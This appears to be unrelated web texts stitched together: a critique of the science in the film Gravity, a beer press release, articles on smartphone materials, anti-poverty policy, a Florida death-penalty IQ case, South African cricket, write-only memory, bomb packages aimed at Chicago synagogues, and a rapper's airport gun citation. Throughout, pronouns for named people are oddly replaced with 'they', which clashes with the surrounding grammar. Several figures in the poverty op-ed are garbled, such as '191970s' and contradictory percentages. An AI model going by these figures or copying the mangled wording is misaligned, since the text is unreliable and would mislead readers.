We understand the need for personalities in a movie like this, but really at times Clooney's character suspended belief a bit too much. At the start he's flying around the Space Shuttle at who knows what speed in their jetpack, mouthing off about random stuff and generally acting in a pretty dangerous manner while maintaining a complete lack of professionalism that wouldn't suit any astronaut, let alone a veteran supposedly of their calibre. No astronaut would act like they did. Well, except that idiotic Indian astronaut who throws themselves to the end of their tether, which would probably have cut them in two. Astronauts are supposed to be competent, highly trained professionals that work together for months. Which brings us to…
2. How did the astronauts not know anything about each other?
When astronauts find out who they're going to be flying in space with, they begin training with them on a daily basis for several months. So why didn't Clooney and Bullock know anything about each other? Clooney doesn't even know where she's from! Although judging by their earlier misdemeanours, we wouldn't be surprised if they were allowed to just skip training altogether so they could brush up on the stories they were going to tell while in space.
3. All those communications satellites would've been fine
Houston tells the astronauts that the Russians have shot down a satellite in low Earth orbit (LEO), meaning a communications blackout is imminent. But why? Communication satellites orbit much, much higher in geostationary orbits (so they're always above the same point on Earth). Like, 35,000 kilometres (22,000 miles) higher. We were trying to think of some scenario here where a satellite exploding in LEO might have affected geostationary orbit but nope, there isn't one.
4. Sandra Bullock would have been screwed pretty early on
When Bullock's character, Dr. Ryan Stone, gets flung from the Space Shuttle after the space junk impact, they appear to be moving at a pretty alarmingly quick speed. It's a good 5 or 10 minutes before Clooney makes their way over to pick them up. Would they have found her, let alone catch up with her? Probably not. Although we guess this one isn't that implausible.
5. There's no way to get from Hubble to the ISS easily (especially not with a jetpack)
Yeah, this is the one everyone's been talking about. The Hubble Space Telescope orbits at an altitude of 559 kilometres (347 miles); the ISS is at 424 kilometres (263 miles). It might not seem that different, but it is. There's no feasible way to move from the higher orbit of Hubble to the ISS, and especially not in a space jetpack (spacepack? spacejet?) like Clooney does. However, we like to think that maybe, as this was a hypothetical future Shuttle mission that never happened (STS-157 if we remember correctly; the last was actually STS-135 in July 2011), then maybe, in this crazy future orbit-friendly timeline, NASA decided to try and move things like Hubble and the ISS closer together in Earth orbit. This is also absolute crap a good way to explain one of our later quibbles.
6. You can't hit things at speed in space and expect to survive
Jesus, in the movie those astronauts don't half like banging into things. The doomed Indian astronaut at the start flings themselves to the end of their tether; Clooney smashes into Bullock in their jetpack; both Clooney and Bullock slam into the ISS; Bullock jumps into the Chinese Tiangong-1 space station in what we can only assume was a suicide attempt (more on that later). And what's the common theme here? All the astronauts are unscathed, healthy and generally loving life (ish). In reality? Those bone crunching impacts would have been literally bone crunching. If you slam your body into a rigid object in Earth orbit, your body is going to be pretty much a goner thanks to the vacuum of space, the weightless environment and the lack of friction. But who wants to see a movie where Bullock's crippled body is wedged into the ISS for two hours?
7. Sandra Bullock was a bit too, uh, scantily clad
When our how-old-is-she-again hero gets out of their spacesuit in the ISS, we are treated subjected to an astronaut wearing what we don't in the office most days: underwear and a tight fitting shirt. In reality they would have emerged from that suit a sweaty mess from the exertion of spacewalking, sporting a liquid cooling undergarment and an adult-sized nappy (seriously, just ask Chris Hadfield). But did we really want to see a sweaty, nappy-wearing Sandra Bullock emerge from that spacesuit? Uh, probably not. Good job, Hollywood.
8. Why did Clooney keep talking to Bullock when they were CLEARLY RUNNING OUT OF OXYGEN?
When Clooney and Bullock were drifting towards the ISS from Hubble, which we've already told you was ridiculous absolutely totally possible, they told them they had 2% of oxygen left. So, why the hell did they keep making them talk?! Did they want them to die? Perhaps. It's a good thing they got their own back…
9. Clooney didn't need to die (although we're glad they did)
I heard someone say recently that this scene was an offense against science. A bit drastic, perhaps, but I'll allow it. Here's the moment in question:
What's wrong here? Well, when Bullock is holding onto Clooney, they're both stationary and have the same angular momentum. But they inexplicably tell them that they have to let go or they'll both die, at which point they gain momentum from some invisible force and is thrown into space. Even if they weren't stationary, why didn't they just pull them towards her? They would have just drifted past, and then could've grabbed hold of the rope. Or they could have left them there, turned around, grabbed more of the rope, then turned round and picked them up again. And, even if all this failed, why did Clooney think it was such a stupid idea that they go get the Soyuz and come pick them up? Didn't they do exactly the same thing but in their jetpack earlier on? Gah! Oh well, at least we got rid of the worst astronaut ever.
10. That 90 minutes thing? It's sort of right, but mostly baloney
You'll remember that Clooney mentions how the debris is going to come around every 90 minutes so they tell Bullock to set their watch to get ready for the impending disaster. We get the intention here; the ISS orbits the Earth every 90 minutes (actually it's 92.91 minutes but whatever), so Hollywood are saying the astronauts will encounter the debris every 90 minutes. Well, they're wrong. For one, the debris is in the same orbital plane and it's not stationary, so they wouldn't run into it every time they completed an orbit. In fact, they probably wouldn't see it at all (Earth orbit is a big place). Even if the debris were moving directly towards them, it wouldn't repeat at a regular 90 minutes; if anything it'd be less. Put this one in the ‘things they tried to get right but got wrong' bin.
11. Tears don't float in space so no cool 3D effects for you
Surface tension in space is a fickle business. Remember when Bullock is all weepy in the Soyuz spacecraft and their tear drifts out towards you in wonderful 3D? In actuality it would've just stuck to their face as it left their eye. But we'll agree that's pretty lame to see in 3D, and we probably wouldn't shell out a few extra quid for ‘incredible surface tension effects'.
12. Getting to Tiangong-1 from the ISS? Yeah, not gonna happen
In the Gravity universe it seems, as we've mentioned earlier, future governments decided to move everything in space closer together. Because the ISS and Tiangong-1 are nowhere near each other, and there's no way you'd see one from the other in the modern day, let alone travel between them. But we'll forgive Hollywood in this orbit-friendly timeline and just assume that our future selves are idiots who think moving very sensitive equipment closer together in Earth orbit is a good idea.
13. What the hell was Bullock's plan before they grabbed the fire extinguisher to recreate Wall-E, just jump?
Like, she's about to jump out of the Soyuz and at the last second remembers the fire extinguisher. What the hell, was they just going to jump towards Tiangong-1 and hope for the best? Did they even read number 6 above?
14. Good luck swimming out of a flooded capsule when you've just returned from space
Yeah, so, when you've spent a prolonged amount of time in space, readjusting to Earth's gravity isn't easy. The chances that Bullock would've been able to swim out of that flooded Shenzhou capsule are pretty non-existent. Although, we suppose this may have all been set at the start of their mission before their bones and muscles had deteriorated in the weightlessness of Earth orbit. We suppose.
15. Yeah, yeah, like the person with months of astronaut training can't pick the right spacesuit – COME ON
This is the biggest one of them all (maybe sarcasm, maybe not). When Bullock gets out of the Soyuz spacecraft to transfer to the Tiangong-1 station they are clearly wearing a Sokol re-entry suit and not an Orlan spacewalking suit, the latter of which would let them live in space and the former of which would probably see them die pretty quickly. What are we to believe, like this is some sort of magical xylophone or something? Oh wait, wrong Simpsons reference.
16. Coming in from a spacewalk isn't that easy
On several occasions Bullock enters a spacecraft/space station, takes off their spacesuit and is immediately fine. In reality she'd need to spend a few hours breathing oxygen and nitrogen to avoid suffering the bends before they could actually do anything useful, like setting the ISS on fire.
But it's not all bad. Here's what they got right…
NASA did use to have a space jetpack (sort of)
So, the space jetpack spacepack space-flying-thing Clooney was using? Yeah, almost totally legit. It was tested in 1984 by NASA; we actually spoke to the guy who set the record for the furthest spacewalk in it last year. Sadly, though, they discontinued it pretty quickly. Guess they didn't know how useful it would turn out to be in the future when a series of implausible events occurred simultaneously.
Space debris is a growing problem and we're all gonna die (probably)
The Kessler syndrome is a very real threat. Go read about it. There have been several instances in the past where accidents or stupidity have drastically increased the amount of space debris in Earth orbit. Although not certain, some are convinced that there will come a point in future when Earth orbit is so crowded that a Kessler syndrome-like event will be guaranteed to occur. We'll tell you when it's time to panic.
Something something atmospheric drag
So, that Chinese space station burning up at the end was pretty unrealistic, right? Well, not so much actually. You see, atmospheric drag is a problem. In fact, even the ISS needs to be regularly boosted to prevent it falling into the atmosphere. If left untended, space stations like Tiangong-1 would indeed eventually burn up in the atmosphere. Now you know.
Bullock would've survived when imaginary Clooney opened the hatch
Sure, it was only in their imagination, but some people mentioned this to us; would Bullock really have survived if Clooney had opened the hatch to get into the Soyuz spacecraft while they aren't wearing their spacesuit? The answer is sort of yes; humans can survive for about 30 seconds in space unprotected, as long as they don't breathe or anything. Most of our research comes from an incident where a test subject was *cough* accidentally *cough* exposed to a vacuum on Earth, and not totally on purpose because NASA wanted to know what would happen. However, they probably would've been sucked out into space by the sudden change in pressure. So there's that.
All the buttons and modules and technology and things were spot on
Go ahead, pull up some schematic diagrams, pore over some technical drawings. You'll be hard pressed to find any aesthetic errors on Hubble, the ISS or the Soyuz spacecraft. The layout, look and even the buttons of each object were meticulously recreated in CGI to ensure that, even if you couldn't stand the science, you'd love the engineering aspect of the movie. Although we can't say the same for the Chinese space station. Who knows what's in there exactly? Hollywood's guess was as good as ours.
You can follow Jonathan on Twitter @Astro_Jonny
Images courtesy of Warner Bros Pictures and NASA
The Best Brewer In The World Doesn't Have A Brewery
Struise bottles its liquid art for the global marketSANTA ROSA, Calif., January 29, 2008 Tens of thousands of beer reviewers around the world, many having tasted over 1000 beers, have chosen the best brewer in the world -- and that brewer is Struise of Woesten-Vleteren, Belgium.Struise however doesn't have a brewery. And they're not professional brewers either. The Belgian brewing team of Carlo, Peter, Phil and Urbain, does its brewing in its spare time away from working their day jobs. They have a relationship with a brewery in Woesten-Vleteren, Belgium -- not far from the former world champion brewers at Westvleteren Abbey -- where they bring in their own ingredients and brew on their own equipment.The result has unequivocally been nothing short of world class. Not being a commercial brewery that needs to turn over product in order to stay alive means that we can wait until our beers are perfect before releasing them, explains Carlo. This means their distributors in Europe, American and Japan, are patient. And their consumers are just as patient. It's not uncommon to get your Struise after sitting on a waiting list at a mail order beer shop.Selling their beer overseas is critical to Struise's success. Urbain explains, We have found Belgium to be a very traditional and difficult market. The majority of Belgian beer consumers drink the usual industrial stuff from big breweries. A smaller percentage will experiment with the better Belgian ale styles and trappists. Even there, there's almost no room for innovation.Struise is all about innovation. They tapped into the online beer scene many years ago and, unlike most other European brewers, have used internet resources to experience beer from around the world, most notably from the United States and Denmark. They've created a unique style of beer making, harmonizing popular styles from around the world with their own pure invention.So what does it taste like? You can read the reviews at RateBeer.com but a short preview: Their gigantic Imperial Stout, Black Albert, weighs in at a monster 13% and hammers notes of dark chocolate and plums. Struise Pannepot Grand Reserva Oak Aged matured ten months in Calvados oak barrels. Their ruby-colored Earthmonk is wine-like and tart.RateBeer.com tabulates a list of the best things in beer annually in what is the world's largest beer competition, RateBeer Best. RateBeer has assembled more than 1.4 million beer ratings from tens of thousands of reviewers around the world. Unlike most beer competitions, the amateur judges rate commercial samples, often consumed entirely  not just little sips shot into a spittoon.https://www.ratebeer.com/ratebeerbest/https://www.ratebeer.com/Joe Tucker302.476.2337
Whether you prefer the iPhone, Android, Windows Phone or BlackBerry, it's hard to deny that Apple's phones are the best-looking of the bunch. But lately, other phone makers have been coming around.
Doug Aamoth / TIME.com
Whether you prefer the iPhone, Android, Windows Phone or BlackBerry, it's hard to deny that Apple‘s phones are the best-looking of the bunch.
For years, it seemed like other phone makers weren't even trying to compete on design. While competitors kept up with the iPhone in thinness and lightness, they relied almost exclusively on plastic, making their phones feel creaky and cheap.
Lately, phone makers besides Apple have been coming around to the idea of premium designs. The HTC One is a gorgeous phone encased in a single slab of aluminum, and Nokia is reportedly working on an aluminum-clad Windows Phone. Although Samsung is using plastic for the Galaxy S 4, the company is rumored to be using metal for the next Galaxy Note. Aluminum isn't the only material phone makers are turning to, either; Sony's Xperia Z and Google's Nexus 4 have glass panels on both the front and back of the phones — a nod, perhaps, to Apple's iPhone 4 and 4S.
What took Apple's rivals so long? I asked Ming-Chi Kuo, an analyst at KGI Securities with solid supply chain sources, to shed some light on the matter. They shared a couple theories for why phone makers are suddenly interested in aluminum, in particular:
Aluminum is now cheaper and easier to implement thanks to Apple itself, and its extensive use of the material in products like the iPhone 5 and iPad. “Apple is the first one to boost the demand for metal casing in the consumer electronics market and it drives the related suppliers of aluminum casing (e.g. equipment providers, casing makers) to invest more on capacity and technology,” Kuo wrote in an e-mail. High-end phones are facing tougher competition from cheaper ones, and using aluminum is one way for smartphone makers to differentiate their more expensive products. That makes sense to me; the difference between a high-end phone and a cheaper product isn't as significant as it used to be, leading to the perception that the latest and greatest smartphones are kind of boring. If you're an Android user, a shiny aluminum design might be the one thing that convinces you to spend a little more.
I have another theory: in the United States, wireless carriers haven't been futzing with phone makers' designs like they used to. Whereas each carrier used to demand variants on phones like the Galaxy S, with their own designs, branding and features, carriers like AT&T and Verizon now seem more content to let phone makers come up with a single design, even if it's not an exclusive. Apple led the way on that front, followed by Samsung, and now HTC is going the same route with the One. It's easier to mass produce one design than a half-dozen variants, which could mean phone makers are having an easier time using high-end materials.
Plastic does have its defenders: Some users insist that it feels less fragile than glass or metal — but it also makes the phone feel more like a toy than a precision instrument. As Android and Windows Phone become more refined, I'm glad to see some phone makers using high-grade materials to match.
Not that it really matters, because you'll probably put an ugly case on the thing anyway.
Fifty years ago, President Lyndon Johnson stood before Congress and declared war on poverty. Their plans included broadening the food stamp program, extending minimum wage coverage, increasing education funding, and providing “hospital insurance” for older Americans. Johnson spoke of millions of Americans who lived on “the outskirts of hope,” and challenged the country to “replace their despair with opportunity.”
Contrary to conventional wisdom, American hasn't lost the war on poverty. We stopped fighting it. It's time to take up the challenge Johnson issued 50 years ago. We must not only renew the fight against poverty, but we must fight for jobs, livable wages, and economic growth that benefits all.
What Works
The war on poverty was successful. We have the numbers to prove it.
Critics of government anti-poverty efforts point to the current poverty rate as evidence of their failure. When Johnson stood before Congress, the national poverty rate was near 19 percent. After 50 years and trillions of dollars spent fighting the war on poverty, the national poverty rate is an unimpressive 15 percent.
Who can blame them? It's simple. It's also wrong. The poverty measure was established in 1963, and hasn't changed since then. It only counts a family's cash income before taxes, and doesn't take into account anti-poverty programs that have lifted families out of poverty.
The Census Bureau solved this problem by introducing the Supplemental Poverty Measure, which factors in the effect of anti-poverty programs. These Census statistics tell a different story: From 1963 to 1970, the poverty rate dropped from 22.6 percent to 12.6 percent — a staggering reduction, in just six years.
Poverty dropped substantially from the start of Johnson's anti-poverty offensive. What made the difference? The very same “centralized, bureaucratic, top-down anti-poverty programs” that Rep. Paul Ryan (R-Wis.) railed against this summer during a House Budget Committee hearing on the War on Poverty.
A recent University of Chicago/Notre Dame paper by Bruce D. Meyer and James X. Sullivan, which looks at low-income families' consumption rather than income, and accounts for the impact of anti-poverty programs found that:
Poverty rates have declined steadily since the 1960s and 191970s, and dropped 12.5 percentage points since 1970.
During the 1960s and 1970s, the tax code became friendlier to low-income families. Tax cuts for low-income Americans, combined with tax cuts for parents (the child tax credit) and the working poor (the Earned Income Tax Credit), accounted for a lot of the drop in poverty. In fact, the EITC pushed after-tax poverty down in the 1990s, and in 2011 kept 6 million out of poverty — including 3 million children.
A Columbia University study found that :
Programs like food stamps and unemployment insurance have made huge difference in reducing poverty rates since the launch of the war on poverty.
These safety-net programs have helped reduce the percentage of Americans living in poverty from 26 percent in 1967, to 16 percent in 2012.
Without these safety-net programs, more Americans would be living in poverty today – 29 percent, compared to 27 percent in 1967.
According to a study by the Agriculture Department, food stamps helped reduce the poverty rate by nearly 89 points during the recession.
Victories in the war on poverty show us what works. The decades that followed the war on poverty make it clear what doesn't work.
What Doesn't Work
“We fought a war on poverty,” Ronald Reagan famously said, “and poverty won.” America only fought a serious, well-funded war on poverty for a decade — even less, writes Michael Tomasky. In the 1970s, the war on poverty began losing steam, and money that might have funded the war on poverty was instead diverted to the war in Vietnam.
With presidency of Ronald Reagan, and rise of modern conservatism, the 1980s signaled a backlash against anti-poverty programs. The declining poverty rate plateaued, as the fates of anti-poverty programs ebbed and flowed. A new war, of sorts, began.
Ronald Reagan deployed the “welfare queen,” during their 1976 presidential campaign — an '80s update of the Victorians' “undeserving poor” in blackface — as part of their mission to vilify welfare and welfare recipients, at the expense of black women living in poverty. It was the opening shot in what would become a full-fledged conservative “war on the poor.” Though mild when compared to present-day conservative rhetoric about the poor, it is echoed by every tea partier who mocks the poor and every conservative who blames the poor for their poverty.
In the 1990s, “welfare reform” presented conservatives with a model. Passed by a Republican Congress (with help from Democrats Who Should Have Known Better ™), and signed by a Democratic president, the 1996 Personal Responsibility and Work Opportunity Act marked a shift in the war on poverty. It ended welfare as an entitlement, placed a five-year limit on federal benefits, and block-granted programs to states.
Conservatives tout it as a success, but “welfare reform” was a “catastrophic success” at best. Welfare reform was only successful in getting people off the welfare rolls. Those who were kicked off the rolls either found jobs that paid too little, returned to welfare, or ended up with no income and few resources.
“Welfare reform” reduced the number of people receiving help, but did not reduce the number of people who needed government assistance. That's the “success” on which Rep. Paul Ryan modeled their budget. It's also the conservative model for “reforming” the programs of the war on poverty, from Medicaid to food stamps.
“Welfare reform,” in all its various forms, amounts to a surrender in the war on poverty.
Moving Forward
It's too soon to declare victory in the war on poverty, but it's also too soon to admit defeat. We are only halfway through this battle.
Without anti-poverty programs, nearly 24 million more Americans would be living in poverty. The poverty rate would rise to nearly 30 percent — almost double the current rate.
Antipoverty spending alone is not enough. These programs have been effective, but they have had to work even harder to address the challenges faced by the increasing number of people who are being denied the benefits of economic growth in today's economy. Unless we address those economic realities, we'll have to keep ratcheting up anti-poverty spending.
The war on poverty must be matched with a fight for a more equitable economy, that includes full employment, livable wages, and economic growth that benefits all.
Livable Wages. Low-wage jobs keep incomes low. Half of all jobs in the U.S. now pay less than $35,000 per year. Many pay much less, leaving workers unable to afford food, shelter, transportation and medical care. Raising the minimum wage could lift 5 million out of poverty, and reduce the poverty rate for adults aged 18 to 64.
Full Employment. Right now, there are three unemployed people competing for every job opening. Fighting for full employment must go hand-in-hand with fighting poverty. It will require major investment. But first, Democrats will to abandon complicity in prioritizing deficit reduction over job creation, and get over their fear of being labeled with “L Word.”
Economic Growth. Full employment will require reviving economic growth, so that everyone who wants or needs a job can find one. Ending tax policies and trade agreements that make it easier for businesses and corporations to send jobs and money overseas might be a good place to start.
That poverty is still with us doesn't mean we've lost. It means we have more work to do. The conservative response to poverty is to cut assistance and let the chips fall where they may. Progressives must fight to preserve anti-poverty programs, and to create an economy that produces good jobs, full employment and livable wages – an economy in which everyone has opportunities to participate and to prosper.
In Florida a criminal with an IQ of 70 or more is deemed competent to be executed. Pat Sullivan / AP Photo
A Florida inmate is challenging the state's rigid use of IQ to determine mental competency, in a case that spotlights the issue of the intellectually disabled on death row.
Nearly 12 years after barring the death penalty for the intellectually disabled, the Supreme Court on Monday will hear the appeal of Freddie Lee Hall. If they lose, the 68-year-old, who has spent 35 years on death row and has an IQ of 60 to 80, is likely to be executed.
IQ scores of 90 to 110 are considered average on most accepted intelligence scales.
In June 2002 the high court barred states from executing intellectually disabled inmates but until now has let states determine the level of mental competency. In Florida a criminal with an IQ of 70 or more is deemed competent to be executed.
Hall, convicted for the rape and murder of a pregnant woman, has been declared "mentally retarded" since childhood. In nine tests from 1968 to 2008, Hall scored as low as 60 and as high as 80, with their most recent IQ 69 to 74, according to the state.
In their appeal, their lawyers argue that Hall falls within a five-percent margin of error cited by psychiatrists and experts when assessing IQs.
"No IQ test is a perfect measure of intellectual ability," their written appeal says.
"The best that any test can do, even when correctly administered, is to provide a certain level of confidence, as a statistical matter, that a person's true IQ score ... is within a particular range."
It adds, "The predictable consequence of Florida's rule is that persons with mental retardation will be executed. Without this court's intervention, that will happen here."
Hall's lawyers argue that the rigid threshold is inconsistent with the commonly agreed-upon definition of mental disability, embraced by the Supreme Court in its 2002 decision, which most U.S. states use.
John Blume, a professor of Law at Cornell University, wrote on an American Constitution Society blog, "A ruling in Hall's favor will not affect many states — or for that matter many cases ... Nevertheless, the case is still important, not only to Hall — whose life literally hangs in the balance — and other Floridians with an intellectual disability, but also to make clear that states cannot narrow a categorical ban created by the Supreme Court intended to protect a vulnerable group from wrongful execution."
Florida Attorney General Pamela Jo Bondi said in court papers that for death row inmates "the risk of overdiagnosis of mental retardation is particularly pronounced."
"(They) have every incentive to secure such a diagnosis," they said.
Florida officials have also argued that there's no national consensus about a strict IQ limit and no reason for the court to impose one.
The outcome of Hall's case is unlikely to affect the busiest death penalty state, Texas, which does not impose a rigid IQ criterion to assess mental disability.
In Georgia, Florida's neighbor, death row inmates need to prove intellectual disability "beyond a reasonable doubt." Warren Hill, who has an IQ of 70, had their application for a stay dismissed in October by the Supreme Court.
Al Jazeera and wire services
There's a generation of South Africans whose memories of watching their Test team play in Australia are the complete opposite of Faf du Plessis and their team's. Generation now. Anyone 10 or younger has never known a South African side that has lost a Test series in Australia and to have added a layer to that legacy is this team's greatest joy.
"We know how hard it is. We watched on TV for so many years how hard it was to was for South Africa to come here and do well," du Plessis said. "I suppose the younger guys looking from back home can see that it's possible to come here and to an extent and dominate an Australian team. It is extremely special for us. It's something we will remember as a team. That's exactly what we came here to do, we want to create memories together."
Not since the West Indies between 1984 and 1992 has a team won three successive series in Australia but that is not the only thing that stands out about this South African victory. It is that they did it without the two players who have been stalwarts for a decade - AB de Villiers and Dale Steyn who are both injured - and Morne Morkel about whom there are concerns about match fitness. Also Hashim Amla, the leader of the batting line-up, contributed only 48 runs across three innings.
Kyle Abbott was central to South Africa's third consecutive series win in Australia Cricket Australia/Getty Images
It has taken a total team effort, something du Plessis has lauded. "This team has been very close to exceptional," they said. "There haven't been many things we've done wrong. We have been consistent in the way we perform. We are not relying on one or two players. All Xis are putting our hands up at different times and that's what you want from your team."
Australia were warned of South Africa's ability to spread the load last month in the ODI series. Albeit in a different format, in different conditions, South Africa's 5-0 victory did provide the springboard for this series. "We came across here with a lot of confidence," du Plessis said.
Self-belief helped South Africa bounce back from a poor first day in Perth to take 10 for 86 and set themselves up for victory there. It also propelled them to pluck Australia for 85 in the first innings in Hobart. The twin collapses showed South Africa that Australia had weaknesses they could exploit, especially if they targetted their senior players.
"When you are a team that's under the pump and under pressure and not playing as well as you like, confidence will fade away," du Plessis said. "It's hard to fake it. We didn't give them the opportunity to do it [assert themselves over a long period of time]. It was important to keep the important guys in the team quiet - David Warner and Steve Smith. If you can put a lot of pressure on them, the younger guys won't have that same punch. We made sure those guys have been relatively quiet in the series. Even guys like [Mitchell] Starc, they bowled well in that one spell but if you are on top, that's when you get a five-for and you clean the tail up. We were just really good in making sure we stopped that."
Faf du Plessis: "This team has been very close to exceptional. There haven't been many things we've done wrong." Cricket Australia/Getty Images
On the other hand, once South Africa got an opening, they were unstoppable. It took just 95 minutes for them to finish Australia off on the fourth morning. Du Plessis did not expect the series win to come so quickly, although they suspected victory was inevitable after the pressure their bowlers piled on late on the third day. "I didn't expect it to happen that quickly," du Plessis said. "Yesterday, our bowling was exceptional. The last hour and a half, we were so good in our areas and relentless. We didn't get the results we wanted but we knew today if we came back, it would change for us. This is one of those sessions we will always remember as a team, that won us the series and it was unbelievable."
It was unbelievable because it was more dominant than a South African side has ever been in Australia. Four years ago, South Africa battled through the first two drawn Tests and then won the third. Eight years ago, they won the first two Tests and lost the third. This time, du Plessis wants to take everything South Africa can from this trip, which means a win in their first day-night Test in Adelaide.
"That is the mission for us now," they said. "We want to do that very badly. We won't rest on our laurels and be happy with 2-1 or even 2-0. We've got Australia in a position where they are under pressure and we don't want to let that go. It's hard enough to get them in this position so we will do everything we can to make it 3-0."
What memories that will make.
This article is about the fictional computer memory. For the actual hardware and applications, see Write-only memory (engineering)
Write-only memory (WOM) is the opposite of read-only memory (ROM). By some definitions, a WOM is a memory device which can be written but never read. Initially there seemed to be no practical use for a memory circuit from which data could not be retrieved. The concept is still often used as a joke or a euphemism for a failed memory device.
The first use of the term is generally attributed to Signetics in 1972. Signetics published some write-only memory literature as the result of an inside practical joke, which is frequently referenced within the electronics industry,[1][2] a staple of software engineering lexicons,[3] and included in collections of the best hoaxes.
Signetics [ edit ]
The datasheet was created "as a lark"[4] by Signetics engineer John G 'Jack' Curtis[5] and was inspired by a fictitious and humorous vacuum tube datasheet[6] from the 1940s. It was seen as "an icebreaker" and was deliberately included in the Signetics catalog.[5]
Roy L Twitty, a Signetics PR person, released a tongue-in-cheek press release touting the WOM on April 1, 1973.[7]
Instead of the more conventional characteristic curves, the 25120 "fully encoded, 9046×N, Random Access, write-only-memory" data sheet included meaningless diagrams of "bit capacity vs. Temp.", "Iff vs. Vff", "Number of pins remaining vs. number of socket insertions", and "AQL vs. selling price". The 25120 required a 6.3 VAC V ff (vacuum tube filament) supply, a +10 V cc (double the V cc of standard TTL logic of the day), and V dd of 0±2% volt (i.e. ground). It was specified to run between 0 and −70°C.[8]
Apple [ edit ]
In 1982, Apple published their official Apple IIe Reference Manual (part number A2L2005),[9] which included two references to write-only memory:
On page 233:
bit bucket: The final resting place of all information; see write-only memory.
On page 250:
write-only memory: A form of computer memory into which information can be stored but never, ever retrieved, developed under government contract in 1975 by Professor Homberg T. Farnsfarfle. Farnsfarfle's original prototype, approximately one inch on each side, has so far been used to store more than 100 trillion words of surplus federal information. Farnsfarfle's critics have denounced their project as a six-million-dollar boondoggle, but their defenders point out that this excess information would have cost more than 250 billion dollars to store in conventional media.
Book [ edit ]
In 1995 Computer Contradictionary book, it reports EWOM, or Erasable Write-Only Memory (an analogy of EPROM), a memory copyrighted by IBM (Irish Business Machines), which allows the data to be written into and then erased from, for memory re-use.[10]
With the explosive growth of the amount of video data available both online and in private use, there emerged a common joke that video tapes and other video media are "write only memory", because without efficient means of search and retrieval for video data archives, very little is viewed after recording.[11][12]
Other members of the family [ edit ]
The 25120 WOM joined a family of equally-useless parts made before and since. These include the dark bulb, dark-emitting diode, WAS gate, and Inoperational Amplifier.[13] Grandparents were the Umac 606 Infernal Anode Phantasatron and the Electrovoice Rearaxial Softspeaker.[14][15] Note that the Phantastron (not Phantasatron) is a real, if obsolete, circuit for generating precision sawtooth waves.
See also [ edit ]
A small Chicago synagogue dedicated to serving the lesbian, gay, bisexual and transgendered community may have been one of the intended destinations of two packages intercepted abroad that were packed with explosive material, a co-president for the congregation said Saturday.
Or Chadash, a congregation of about 100 people, held its Sabbath services Friday with security out in full force.
"It was unnerving, [but] we carried on as normal," Or Chadash's co-president, Lilli Kornblum, told CNN.
"We do always have security when we have congregational events, however last night Chicago police were in much, much higher visibility," they said. "And we were on higher alert for people we don't know or anyone who might be carrying backpacks, packages, that sort of thing."
Kornblum said Or Chadash was notified that it was a potential target by the rabbi of Emanuel Congregation - another synagogue from which Or Chadash leases space - who received word from a source in the Chicago's Jewish community who is close to authorities.
Emanuel Congregation, however, was apparently not a target.
Earlier, Kornblum had told CNN that Emanuel Congregation's rabbi had received their information directly from authorities.
But in an interview with CNN Saturday, Emanuel Congregation's senior rabbi, Michael Zedek, said they had been notified that Or Chadash was a threat from a Chicago Jewish source "who's well connected to authorities."
Zedek said they heard from the source - who they said requested anonymity - on Friday night.
"People are asking are we frightened," Zedek told CNN, "and the truth of the matter is we're not frightened, we're saddened."
Chicago FBI spokesperson Royden Rice would not confirm or deny that Or Chadash was a target.
"We notified both targets yesterday," Rice told CNN Saturday. "We always notify potential victims of crime. If they wish to reveal who they are, it's up to them."
Synagogues across metropolitan Chicago began taking "appropriate precautions" Friday after receiving warning from security officials to watch out for suspicious packages from abroad, according to a Jewish Federation spokesperson.
President Barack Obama said that two packages that apparently contained explosive materials were bound for "two places of Jewish worship in Chicago," but did not name them.
"[We were] surprised, because we're very, very small," Kornblum said, adding that the 35-year-old synagogue had been trying to get noticed to potentially gain more congregants. "This isn't what we had in mind."
Kornblum said she's "distressed" about the apparent threat, but expressed gratitude for the authorities who were able to intercept the packages.
The Jewish Federation of Metropolitan Chicago was contacted by federal officials Friday morning to urge the organization to be on alert for suspicious packages, spokesperson Linda Haase said.
Lucille Price, a receptionist at Anshe Emet Synagogue, said Chicago police made them aware of the reports and asked them to keep an eye out for suspicious packages among any deliveries that arrived Friday.
But congregation leaders at two prominent Chicago synagogues, Temple Sholom and Chicago Sinai Congregation, said they were not made aware of any attempts to ship bombs or hazardous material to them.
The Anti-Defamation League, meanwhile, sent notice to Jewish organizations across the country on Friday to increase mailroom security and to immediately report suspicious activity to law enforcement.
In New York on Saturday, a police counterterrorism unit conducted a drill outside the Central Synagogue in midtown Manhattan. Members of the New York Police Department's Hercules unit, which conducted the drill, are highly trained and heavily armed.
New York has not received specific threats related to Friday's plot, NYPD Deputy Commissioner Paul Browne told CNN.
The Jewish Federation's Haase said they had not heard reports of Chicago congregations altering plans for services on Friday evening, the beginning of the Jewish Sabbath.
"Everything was fine. Services were held as usual with no signs of anxiety," said Rabbi Michael Sternfield, who leads Chicago Sinai, after services Friday night. "There is really nothing to report."
Steven Bob, the rabbi at a synagogue in the western Chicago suburbs, said Friday that they were not concerned about the exposed plot.
"We generally pay careful attention to packages coming to the synagogue, accepting only those we're expecting or from a known sender," they said. "Today we were extra careful."
Bob said that there was plenty of email and phone traffic among Chicago Jewish leaders responding to news of the plot on Friday but that they didn't think worshippers would be deterred from Friday services.
"We live in a world that contains some people that are hostile to us and we want to respond to that hostility with caution," said Bob, who leads Etz Chaim in Lombard, Illinois. "At the same time, we're not going to go hide in the basement."
"I may say a word or two about this tonight, but I don't think it's worthy of a sermon," they said Friday. "What am I going to say, that I'm opposed to terrorism?"
- CNN's Susan Candiotti, Dan Gilgoff and Ross Levitt contributed to this report.
Too Short was arrested and cited Thursday (Oct. 2) for taking a loaded gun into a Southern California airport the day before and then fleeing the scene, Hip-Hop Wired reports. Short, whose birth name is Todd Shaw, was going through security at the Bob Hope International Airport in Burbank, Calif. around 1:45 p.m.
A TSA worker noticed a “carry-on bag passing through the scanner that contained a handgun,” at which point Short abandoned their belongings and left the airport “via an exit door, before they could be detained,” authorities said.
They came back the next day with their lawyer in tow and was cited for misdemeanor possession of a loaded handgun in a public place. Short is due in court Nov. 3.
The 48-year-old Bay Area rap vet is building a reputation for trying to get away when the law is involved. Last year, they were arrested for DUI after they attempted to run away from cops only to be caught and taken to jail. They were charged with four misdemeanors, including possession of marijuana.
BET.com is your #1 source for Black celebrity news, photos, exclusive videos and all the latest in the world of hip hop and R&B music.
Click here to subscribe to our newsletter.
This is a developing story.
7400 Pinewood Drive
Directions To | Directions From 7400 Pinewood Drive Chattanooga, Tennessee
A police officer pulls out a semi-automatic weapon as a fight breaks out following a shooting in East Brainerd. Photo by Steve Johnson /Times Free Press.
